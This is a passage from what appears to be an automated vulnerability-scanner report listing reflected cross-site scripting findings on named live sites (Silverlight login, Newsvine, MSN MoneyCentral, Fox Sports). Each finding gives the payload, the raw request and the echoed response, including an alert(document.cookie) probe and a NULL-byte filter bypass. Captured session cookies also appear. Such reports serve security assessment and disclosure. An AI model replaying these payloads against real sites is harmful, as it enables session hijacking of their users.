Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; udm_0=MLv39VMJbipn554F09GgNxMpkOwhQkB+ReMynNmKbjrhoBNeBtv5glFga/EX00ge7s9SE/kLHg0oVCPoIUwn1u/1quN4wFLkemB+Xfkh9sVvaV9d1yFwVk1MqQQXIESd+rMOsJq/lEzttO20QWpsbjS5fd2sBKwIWtd/mfri7f0iscF0KJp4BDYI/KwV2hfJzpDxxCsBHcBPVMRoqZgnORQjaPsdQGhZw7tulNqoiwJSvbEKZ4b/qo/4Cpz6QixGs3JFcz/d47RI0f52a8VOS/oanKbybuVRwAchWXhFZ49mH79cJcwjgNFziR+AwH35dr4QzoinlMcvdLgHgXDxmSnMsPB5jNFYycfQEQ6WS1ThuvKZxCd7clanJafNMYS5TsOkkRggNjtpwI087PpWPpMGetCS0D1wi9rmgfAMFRd5aDbdKVB2JU+QCgclcDlyuDtZxlosVpDeByLznalOYezhNJsbXFXdXtxNy+mVjXktVgVuO02ZHyOWogEfqWo4Q5+aY1F1AjDLg+Zsegz1mBoDNg4gKj1iT49F4U6JIWjV6bGKomPcb7JGMdfzI0l6BUC35co0AKqs8XsAaIDjj5KVsEEGcSdy9WPDLpzxKicxaVYQocxdaN1mvETNiIM0B0KR0f/D5UmpY+VE1ujREads9zEg6182eq7dR0yVPf2Eqs51v/W/GJSX9U3iDyBHhnrx/9HEhRWq7W15xibc2cnuu+qsy59jOE8/kIy4uagvHOUgRn1vEHdTdFRa22FY6bvlmBiPj5uQlbuYirr/PKeXnTQB/vBeFzGCuuo8S794L0B/o1evuwc3fo7HSrCjZY1OUgnZAsbW9vw8WwL3pDFQEKF9GRw8Jr22FN0q5V5BkTn/vt53Lzox5LPdmUrFCT39va7aVYr9iKzg2DqSfKXOR0G6ztaUqNT2b2dpza0lJm83EhilrO8VMxhWjvKbTssXQxZMSUfIfFD8NggPglVDfE4zxlxdNxQERkcerOzsyPSAcOqxxaha1UpxTYC5JBvlrGZmQVBfjVRJ5mu8/F3MBD+4ebFA7f6NDCpP6R6kenBb79De4ZpLw1N41KiOWS7TiPdLlFhYtJa+jYWXsKx9qlYbnwXDuLSyZnM5Iw0uwz2qU9+zhxlBQq0Sl/JMT2xPGqgISytMqnZvQvLIGnH8Gfu6; rsi_segs_1000000=pUPFek+FKAIQ1kNbPCvXupu0dYRBBw10Qnf0xWQrS0BEV6VWEHVfSnhpJVW5Lutkv1AyDl7qxTuCJgKvTPglemXPFwXO/l9yiURcsiUamtWcEzbP2TrfBHkE6to317EuNk9+iXSG4DvY1g/WBQ7a8qgeGg5oDbhmSSc5VoUxIBgQS/K4Q3yRHjMx2E0L81Hpbsggz0uWpYjffiAisiXmERkc/1665y5ZjB1b5STeJ4Pw4InvEOIoEyC78lpwlYmIydTi5ad2s/hOwYyScvdENQ==; rtc_0=MLsvrtMvcS5nJQFEBOfISErx+c1JMM1lDAyWHQIjVfvuhWI24GqMWoF/oWJdVrkRObfmVAFC7D5kNDpA7XLOLyXT7eHooUJSyInu6zq77Ti1xy5n8Qg3XeEe+tnQc/qNK5SeIuNm9OiemNvg0uPlUbqN72Pj+9+Ar1bDVU7hjepOYqJdor+NnFmpdNvQfxTIoHitxigPuoiTVzaqoruXF69raqbuvDx9NSxO37yG1cXJQrgqNEJYL+2aRbtieJoq+tCHUpTw8bYVhr5p0THE5yB09PMYdBM/swb+JMOM7Snl6/uAVD2lwzGGjsLQzOAv+uBqR8jCXnxVhvn7VWB6iHsq1LcapkedsIN3gi/o04igBj2IKrYeTcLWm4dMlDT7lMD1xWUmpmHTEibAOge6OBtRCgwHRB4CstW16Jo3oxnT; rsi_us_1000000=pUMdIzlHMAYY1E2E9lxOYWXfXTuzYLjp8p1460/+gWTby/AVlHUSZTOeZKFoZQt/V4GpHKodzzO99xyuL+LlNTOgYNk8l7vd9SWxAAvTUjn9wS/Zubj3pseYHAeyBVwS0rUlJRFhp0SxvIn+bW5/BIpp2vBxnS14MViPq2ivke+iDP09PJL7xbJKM3DlRa3LSrtKzc89EsvYTbzu+kGpcc6NxWHBkG8ge2CQugoNifcYvbm/lCUs3YPUzchjpm/nOoJHm/cTLVlzOq2/hXTPb0MyCGujLE+IIF9R1j0tsya4cpTKxDHVHAwYM3CYkYHc7waufhO+YEECVhuwsWC98+TEYKnbvBuZ/LFUC5M+ne413gSJ9fKGNrpOsMVsO4uPvBojOqcVHxnpGBRWnjTCP1cUtV83GYLcdAOzcPrvpMNcC9WG3rFQnzSleYPtOb7kiE3oL1h8KEDcjRCOt4LdC7+bpu9UJrc/0m2ZFKslWZ6fphmOl6qQMtHee9NA2R5+ZaqoZDJiJcH6Cj34rgnO5dCjuZjPEAN3vyk/cs5oNuOTnGtZPmRUwjY4fVfWopHNfW2Hu+t6WTXXmXTsLLsiGCT83eSgcWmlkf8aqGRfLHUzj26RTTM1dA7FHmNLza1hwTpKTQyJZDnk7HhRdai6Qcedk92mB2yV7SyHaep1kc0pnTX1Qc/HzKFDmbdh3+t60ZExD/vR2iAE6pKe1RW2/VKzWWtrj/+vWMTJqMy6KoBls3cVklTZxj0UxrdA3I4yJL2OKgNmAH1FPWgdbdyfuXjzsNfYHjat3uSgUtGUpaBySrTnDVNyX5YanrliGmSmPduj8LhA4KqX2YlmOVFoyDQFpOGcgnSlNcNJ00sfOyYI0EutT6h+jdgkz1QsYDywfKPuWNTZ4xzyhLKndjXyrV+OabUYyXa0zgarUEmj9DZ9ISVT0Ib00Gn+eML8NG2PTlecukGp/CVFvlwLbepBNmq97MFUk0PW3PIS0CJypACtU6kUoxQY2OEYFTYNFJ2uxPeVH2/UEpOEGzASxS069mjpvdCw4bmy1/VIOcn2qE1N5k5tc1MqXjUzdty7zYp2QIKE1MArjDBEYVBC8iDElqY95xHnn/xH0nyKgpVKBBbhJ3uQr4Ko1Livxx0MjJEm3cCuBSwGwiodkkzT5/8QeB3PZQmb6DOXNitLk9xP2Eu8MhqIgnIvQ0UunQUiUnIYGB43AQ9mjtJ2tqaDgCaX2jI1u6Xyp5hG15mbLHdX1UVqq04ZRL18CIJr

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 30 Jan 2011 01:45:52 GMT
Cache-Control: max-age=86400, private
Expires: Mon, 31 Jan 2011 01:45:52 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Sun, 30 Jan 2011 01:45:52 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "A0654656C3D<SCRIPT>ALERT(1)</SCRIPT>22DD092B040" was not recognized.
*/

5.198. https://login.silverlight.net/login/signin.aspx [returnurl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/signin.aspx

Issue detail

The value of the returnurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 981cd"style%3d"x%3aexpression(alert(1))"27f64f44305 was submitted in the returnurl parameter. This input was echoed as 981cd"style="x:expression(alert(1))"27f64f44305 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx981cd"style%3d"x%3aexpression(alert(1))"27f64f44305 HTTP/1.1
Host: login.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 13452
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=f4wmfx55nhab5r55g0gog145; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx981cd"style="x:expression(alert(1))"27f64f44305; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:33:50 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:23:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Sign I
...[SNIP]...
<a href="https://login.silverlight.net/login/signin.aspx?returnurl=http://www.silverlight.net/default.aspx981cd"style="x:expression(alert(1))"27f64f44305">
...[SNIP]...

5.199. https://login.silverlight.net/login/signin.aspx [returnurl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://login.silverlight.net
Path:	/login/signin.aspx

Issue detail

The value of the returnurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7547a"style%3d"x%3aexpression(alert(1))"d77e1fb43b1f1de96 was submitted in the returnurl parameter. This input was echoed as 7547a"style="x:expression(alert(1))"d77e1fb43b1f1de96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx7547a"style%3d"x%3aexpression(alert(1))"d77e1fb43b1f1de96&__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEyNjc1MTYyMTZkZO%2FafV0CJRP%2B2ILM8De2o6zEhcVm&__EVENTVALIDATION=%2FwEWAgLNm4PjCwL0iqHzAh9XOTMNktAsCvWQ8c3pqepo2pjW&ctl00%24mainMiddle%24loginForm%24Button2=Sign+In HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Referer: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx
Cache-Control: max-age=0
Origin: https://login.silverlight.net
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf; forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dlogin.silverlight.net/login/signin.aspx%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bjavascript%25253AWebForm_DoPostBackWithOptions%252528newWebForm_PostBackOptions%252528%252522ctl00%252524ma%2526oidt%253D2%2526ot%253DSUBMIT

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx7547a"style="x:expression(alert(1))"d77e1fb43b1f1de96; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:36:19 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:19 GMT
Content-Length: 15704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
The Of
...[SNIP]...
<a href="https://login.silverlight.net/login/signin.aspx?returnurl=http://www.silverlight.net/showcase/default.aspx7547a"style="x:expression(alert(1))"d77e1fb43b1f1de96">
...[SNIP]...

5.200. http://michaelwann.newsvine.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://michaelwann.newsvine.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d96b9"-alert(1)-"5a6f605e0b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?d96b9"-alert(1)-"5a6f605e0b4=1 HTTP/1.1
Host: michaelwann.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:55:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=6d2f3fb611f44e2c7adec971945fc305; expires=Sat, 25-Jan-2031 17:55:56 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
";currentCommentBox = commentId;var renderedCommentBox = renderCommentBox ("http://www.newsvine.com/_action","http://www.polls.newsvine.com/_vine/images/_/","1411125","http://michaelwann.newsvine.com/?d96b9"-alert(1)-"5a6f605e0b4=1", 0,commentId, "", "", groupId, friendListId, threadId, privateLabel, "01", -1);getElement("dynamicCommentBox_"+commentId).innerHTML = renderedCommentBox;placeSpellChecker ("commentsTextDiv_"+commen
...[SNIP]...

5.201. http://redacted/investor/charts/chartdl.aspx [symbol parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/charts/chartdl.aspx

Issue detail

The value of the symbol request parameter is copied into the name of an HTML tag attribute. The payload 5173f%20style%3dx%3aexpression(alert(1))%20871257c1879 was submitted in the symbol parameter. This input was echoed as 5173f style=x:expression(alert(1)) 871257c1879 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef55173f%20style%3dx%3aexpression(alert(1))%20871257c1879 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://investing.money.redacted/investments/charts?Symbol=indu22b72%22%3balert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 30 Jan 2011 19:53:17 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Length: 25085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<input id="symbol" value="INDU22B72";ALERT(DOCUMENT.COOKIE)//2BADDE9CEF55173F STYLE=X:EXPRESSION(ALERT(1)) 871257C1879" class="textctrl" maxlength="100" size="15" name="symbol" onfocus="if(this.value=='Name or symbol(s)')this.value=''" onblur="if('Name or symbol(s)'.length >
...[SNIP]...

5.202. http://redacted/investor/charts/chartdl.aspx [symbol parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/charts/chartdl.aspx

Issue detail

The value of the symbol request parameter is copied into the name of an HTML tag attribute. The payload 14e81%20style%3dx%3aexpression(alert(1))%209197df0cd41 was submitted in the symbol parameter. This input was echoed as 14e81 style=x:expression(alert(1)) 9197df0cd41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef514e81%20style%3dx%3aexpression(alert(1))%209197df0cd41 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://investing.money.redacted/investments/charts?Symbol=indu22b72%22%3balert(1)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D; userCh=4=1&8=0&20=0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 30 Jan 2011 15:08:48 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Length: 25001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...
<input id="symbol" value="INDU22B72";ALERT(1)//2BADDE9CEF514E81 STYLE=X:EXPRESSION(ALERT(1)) 9197DF0CD41" class="textctrl" maxlength="100" size="15" name="symbol" onfocus="if(this.value=='Name or symbol(s)')this.value=''" onblur="if('Name or symbol(s)'.length >
...[SNIP]...

5.203. http://msn.foxsports.com/cbk/story/Baylor-70-Colorado-66-30467175 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/cbk/story/Baylor-70-Colorado-66-30467175

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9c9c'-alert(1)-'b3d666f6c9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /cbk/story/Baylor-70-Colorado-66-30467175?f9c9c'-alert(1)-'b3d666f6c9a=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 248865
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=12
Date: Sat, 29 Jan 2011 23:50:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/collegebasketball/story/Baylor-70-Colorado-66-30467175?f9c9c'-alert(1)-'b3d666f6c9a=1';

       startComments('StoryComments', '26409015'); // load up team comments
   </script>
...[SNIP]...

5.204. http://msn.foxsports.com/mlb/story/Rangers-Napoli-avoid-arbitration-with-58M-deal-14623420 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/mlb/story/Rangers-Napoli-avoid-arbitration-with-58M-deal-14623420

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc5cb'-alert(1)-'e2af03ab728 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mlb/story/Rangers-Napoli-avoid-arbitration-with-58M-deal-14623420?fc5cb'-alert(1)-'e2af03ab728=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 234575
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=12
Date: Sat, 29 Jan 2011 23:50:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
    var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/mlb/story/Rangers-Napoli-avoid-arbitration-with-58M-deal-14623420?fc5cb'-alert(1)-'e2af03ab728=1';

       startComments('StoryComments', '26394224'); // load up team comments
   </script>
...[SNIP]...

5.205. http://msn.foxsports.com/mlb/story/new-york-yankees-president-ted-levine-calls-out-texas-rangers-ceo-chuck-greenberg-012911 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/mlb/story/new-york-yankees-president-ted-levine-calls-out-texas-rangers-ceo-chuck-greenberg-012911

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c732'-alert(1)-'3b16cbe3f75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mlb/story/new-york-yankees-president-ted-levine-calls-out-texas-rangers-ceo-chuck-greenberg-012911?4c732'-alert(1)-'3b16cbe3f75=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 237708
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=30
Date: Sat, 29 Jan 2011 23:49:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/mlb/story/new-york-yankees-president-ted-levine-calls-out-texas-rangers-ceo-chuck-greenberg-012911?4c732'-alert(1)-'3b16cbe3f75=1';

startComments('StoryComments', '26401001'); // load up team comments
</script>
...[SNIP]...

5.206. http://msn.foxsports.com/nba/gallery/new-york-knicks-atlanta-hawks-fight-marvin-williams-shawne-williams-gallery-012911 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/nba/gallery/new-york-knicks-atlanta-hawks-fight-marvin-williams-shawne-williams-gallery-012911

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba1f5'-alert(1)-'3ac5f96b8f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /nba/gallery/new-york-knicks-atlanta-hawks-fight-marvin-williams-shawne-williams-gallery-012911?ba1f5'-alert(1)-'3ac5f96b8f8=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 223909
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=14
Date: Sat, 29 Jan 2011 23:50:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
var passportLoginURL = 'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nba/gallery/new-york-knicks-atlanta-hawks-fight-marvin-williams-shawne-williams-gallery-012911?ba1f5'-alert(1)-'3ac5f96b8f8=1';

startComments('StoryComments', '73'); // load up team comments
</script>
...[SNIP]...

5.207. http://msn.foxsports.com/nba/story/Marvin-Willians-Shawne-Williams-suspension-Knicks-Hawks-012911 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/nba/story/Marvin-Willians-Shawne-Williams-suspension-Knicks-Hawks-012911

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1c3c'-alert(1)-'b04d6cae059 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

